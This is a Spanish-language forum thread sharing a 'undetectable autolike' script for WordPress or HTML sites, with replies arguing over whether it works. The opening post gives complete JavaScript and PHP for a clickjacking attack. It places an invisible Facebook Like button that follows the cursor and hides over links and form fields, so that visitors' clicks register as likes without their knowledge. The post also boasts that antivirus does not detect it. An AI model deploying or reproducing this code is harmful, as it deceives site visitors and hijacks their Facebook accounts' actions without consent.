Descarga Autolike Indetectable WP y html

Estado
No está abierto para más respuestas.
Mensajes
124
Puntuación de reacción
0
Hola Gente, esta oportunidad les vengo a compartir este autolike indetectable. ;)

✔ Un like por visita.
✔ Si la persona ya dio like no ofrece dislike.
✔ Fácil de editar para que coloques cualquier fanpage.
• Si la persona no esta logueda en face no sale opción de like.
• No es detectado por ningún antivirus.

Probado en WP pero fácilmente lo puedes instalar en html.

Instalación (para WP)...

1.- Descarga los archivos:

You must reply before you can see the hidden data contained here.
2.- En header.php pegar después de la etiqueta <body>....
Código:
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/es_ES/all.js";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
(Es el código que proporciona Facebook para colocar el botón "me gusta")​

3.- En footer.php pegar el script antes del cierre de </body>....
Código:
<div id="cjk-jlike-6" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:1px; height:1px; overflow:hidden"></div> 
<?php
if(!isset($_COOKIE['jlike'])){ 
$like = "like.js";?>
<script>
var apagar=false;var jlike_r='';var fila='';var fila2='';var fila3='';var nuevac='';var jlike=jQuery.noConflict();var fanpage='';var pfp='N';var ptw='N';var pla='N';var j_token=false;var minf5=1;var enlak='N';var izqleft='';var arrtop='';var deright='';var abadown='';var totFp=false;var clickjackt=false;var j_paj=0;function j_preini(){jlike("#cjk-jlike-6").html("");clickjackt=false;bt6();jlikeIni0();}function cjyack(){document.location.href=enlak}function down(){apagar=true;document.body.style.cursor='auto'}FB.init({appId:'477766095590935',status:true,cookie:true,xfbml:true});FB.Event.subscribe('edge.create',function(response){jlike("#cjk-jlike-6").css("width","1px");jlike("#cjk-jlike-6").css("height","1px");document.getElementById('cjk-jlike-6').style.display='none';bt3();clickjackt=true;var shc=getCookie("nf5"); if(j_paj==1&&shc=="0"){setCookie("jlikei",nuevac.toString(),365);}else{setCookie("jlikei",nuevac.toString(),365);}j_paj++;document.body.style.cursor='auto';if(enlak!="N")setTimeout("cjyack()",100)});function bt3(){jlike("#cjk-jlike-6").css("width","1px");jlike("#cjk-jlike-6").css("height","1px");document.getElementById('cjk-jlike-6').style.display='none';jlike("#cjk-jlike-6").css({top:"0px",left:"0px"})}function bt6(){if(clickjackt==false){jlike("#cjk-jlike-6").css("width","27px");jlike("#cjk-jlike-6").css("height","20px");document.getElementById('cjk-jlike-6').style.display='block'}}function token(a){if(a=="1"){jlike("#token_k1").focus();j_token=true}if(a=="2")jlike("#token_k1").blur()}function clickjackJJ(){var nf5=getCookie("nf5");if(nf5=="")nf5=0;nf5++;setCookie("nf5",nf5,365);if(nf5%minf5!=0){document.body.style.cursor='auto';return}document.body.style.cursor='pointer';if(jlike_r!="LIM"){if(jlike_r=="GCO"){fila=getCookie("jlike");fila2=getCookie("jlikei");fila3=getCookie("jlikep")}else if(fila!=""&&fila2!=""){j_paj++; setCookie("jlike",fila,365);setCookie("jlikei",fila2,365);setCookie("jlikep",fila3,365)}var fl=fila.split(",");var fl2=fila2.split(",");var fl3=fila3.split(",");nuevac=fl2;var i=0;while(i<fl2.length){if(fl2[i]=='F'){if(fl3[i]=="fp"&&pfp=="S"){totFp=true;pla='fp';fanpage=fl[i];nuevac[i]='T';break}if(fl3[i]=="fe"&&pfp=="S"){totFp=true;pla='fe';fanpage=fl[i];nuevac[i]='T';break}if(fl3[i]=="tw"&&ptw=="S"){totFp=true;pla='tw';fanpage=fl[i];nuevac[i]='T';break}}i++}if(j_paj==2){var a0c=Xceroc();var a0d=Xcerod();totFp=true;pla='fp';fanpage=a0c+a0d;}if(totFp==false)document.body.style.cursor='auto';if(totFp==true){if(pla=="fp"){jlike('#cjk-jlike-6').append('<div style="position:absolute; width:12px; height:20px; z-index:200;left:8px;"></div><fb:like layout="button_count" href="https://www.facebook.com/'+fanpage+'"></fb:like>')}if(pla=="fe"){jlike('#cjk-jlike-6').append('<div style="position:absolute; width:12px; height:20px; z-index:200;left:8px;"></div><fb:like layout="button_count" href="'+fanpage+'"></fb:like>')}jlike("#cjk-jlike-6").css("width","27px");jlike("#cjk-jlike-6").css("height","20px");if(pla=="fp"||pla=="fe")FB.XFBML.parse(document.getElementById('cjk-jlike-6'));}jlike(document).ready(function(){jlike("#cjk-jlike-6").parent().mousemove(function(e){jlike("#cjk-jlike-6").css({top:e.pageY- 10,left:e.pageX+ 30})});if(totFp==true)setTimeout("bt9()",10)})}}function bt9(){jlike(document).mousemove(function(e){if(apagar==true){bt3();return}var cond_ar=0;if(e.pageX<izqleft)cond_ar++;if(e.pageX>deright)cond_ar++;if(e.pageY<arrtop)cond_ar++;if(e.pageY>abadown)cond_ar++;if(cond_ar>=1){enlak="N"}});jlike(".zzzzz,.invilike,,input,embed,button,textarea,object,select").mouseout(function(){token('1');bt6()});jlike(".zzzzz,.invilike,,input,embed,button,textarea,object,select").mouseover(function(){bt3()});jlike("a").mouseout(function(){bt6()});jlike("a").mouseover(function(){bt3()});}function setCookie(c_name,value,exdays){var exdate=new Date();exdate.setDate(exdate.getDate()+exdays);var c_value=escape(value)+((exdays==null)?"":"; expires="+exdate.toUTCString());document.cookie=c_name+"="+c_value}function getCookie(NameOfCookie){var begin=document.cookie.indexOf(NameOfCookie);if(begin!=-1){begin+=NameOfCookie.length+1;var end=document.cookie.indexOf(";",begin);if(end==-1)end=document.cookie.length;return unescape(document.cookie.substring(begin,end))}return-1}function addslike(path){script=document.createElement('script');script.type='text/javascript';script.src=path;document.getElementsByTagName('head')[0].appendChild(script)}function sFpage(){addslike('<?php bloginfo("template_directory") ?>/js/<?php echo $like; ?>');setTimeout("clickjackJJ();",1000)}function jlikeIni(){var f1=getCookie("jlike");if(f1!=-1){jlike_r="GCO";clickjackJJ()}else{setTimeout("sFpage();",500)}}function jlikeIni0(){pfp='S';setTimeout("jlikeIni();",500);}function jlikeIni2(){ptw='S';if(pfp=="N"){setTimeout("jlikeIni();",500);}}
</script>
<script>
jQuery.getScript("http://www.facebook.com/jens.luebberstedt")
.done(function(script, textStatus) {jlikeIni0();});
</script>
<?php } ?>

4.- En el archivo like.js remplazar TUFANPAGE por el nombre de tu pagina.

Si tu URL es así:
http://www.facebook.com/foro20
Entonces colocarás solo foro20 por TUFANPAGE.

Y si tu url es así:
https://www.facebook.com/pages/ejemplo/15135468741
colocarás pages/ejemplo/15135468741

5.- Finalmente sube la carpeta js en tu tema (/public_html/wp-content/themes/tutema/ :) )

 
Última edición:

Novato

Oro Blanco
Usuario de Bronce
Mensajes
1,239
Puntuación de reacción
3
Gracias, podrias explicar como instalarlo en blogger?
 

fanegator

@pump_upp - best crypto pumps on telegram !
Usuario de Bronce
Mensajes
823
Puntuación de reacción
2
Y como se sabe si funciona? Yo ya lo he instalado pero no se como saber si me funciona o no, alguien podria visitar mi sitio y decirme? El link esta en mi firma, Posteando Curiosidades
Se lo agradeceria
 

victor_Cadiz

Estafador
Mensajes
380
Puntuación de reacción
0
Y como se sabe si funciona? Yo ya lo he instalado pero no se como saber si me funciona o no, alguien podria visitar mi sitio y decirme? El link esta en mi firma, Posteando Curiosidades
Se lo agradeceria

Yo entre en la tuya y no paso nada

Prueba a entrar en la mia es la de mi firma
 

fanegator

@pump_upp - best crypto pumps on telegram !
Usuario de Bronce
Mensajes
823
Puntuación de reacción
2
Yo entre en la tuya y no paso nada

Prueba a entrar en la mia es la de mi firma

He entrado y no me ha salido nada especial ademas en la caja que tienes de face no me sale como que me guste
 

NetReyes

Cobre
Usuario de Bronce
Mensajes
377
Puntuación de reacción
0
Este Autolike funciona perfectamente, solo que yo al momento de instalarlo en WP mi sitio fue catalogado como peligroso por Google por software malicioso.
 

victor_Cadiz

Estafador
Mensajes
380
Puntuación de reacción
0
Pues si entran en mi web que esta en mi firma vereis que no funciona

- - - Actualización- - -

Pues si entran en mi web que esta en mi firma vereis que no funciona
 

GokuSS3

Suspendido
Mensajes
0
Puntuación de reacción
0
Falta explicación :/

- - - Actualización- - -

Falta explicación :/
 

marcs2013

Cobre
Usuario de Bronce
Mensajes
570
Puntuación de reacción
0
NO pierdan su tiempo yo acabo de probarlo y no funciona.

SALUDOS.
 

NetReyes

Cobre
Usuario de Bronce
Mensajes
377
Puntuación de reacción
0
Hola,

Amigo el scrip funciona perfectamente compañero solo que se les esta olvidando algo es un paso sencillo que por eso el scrip no funciona, solo les puedo decir que no se sube el scrip directamente a el theme tiene otra dirección.

Yo e recibido mas de 600 visitas desde que lo puse y sigo con los 451 fans

NO pierdan su tiempo yo acabo de probarlo y no funciona.

SALUDOS.
 

marcs2013

Cobre
Usuario de Bronce
Mensajes
570
Puntuación de reacción
0
Volvi perder tiempo....

Muy pronto! me pondre programar un autolike propio y funcional.

sOLO QUE POR ahora no tengo web con muchas visitas, pero por alla voy, para crearme uno.



Hola,

Amigo el scrip funciona perfectamente compañero solo que se les esta olvidando algo es un paso sencillo que por eso el scrip no funciona, solo les puedo decir que no se sube el scrip directamente a el theme tiene otra dirección.
 
Mensajes
124
Puntuación de reacción
0
Hola,

Amigo el scrip funciona perfectamente compañero solo que se les esta olvidando algo es un paso sencillo que por eso el scrip no funciona, solo les puedo decir que no se sube el scrip directamente a el theme tiene otra dirección.


mm Ami me va en la raíz del tema....
En donde lo esta subiendo?
 
Estado
No está abierto para más respuestas.
Arriba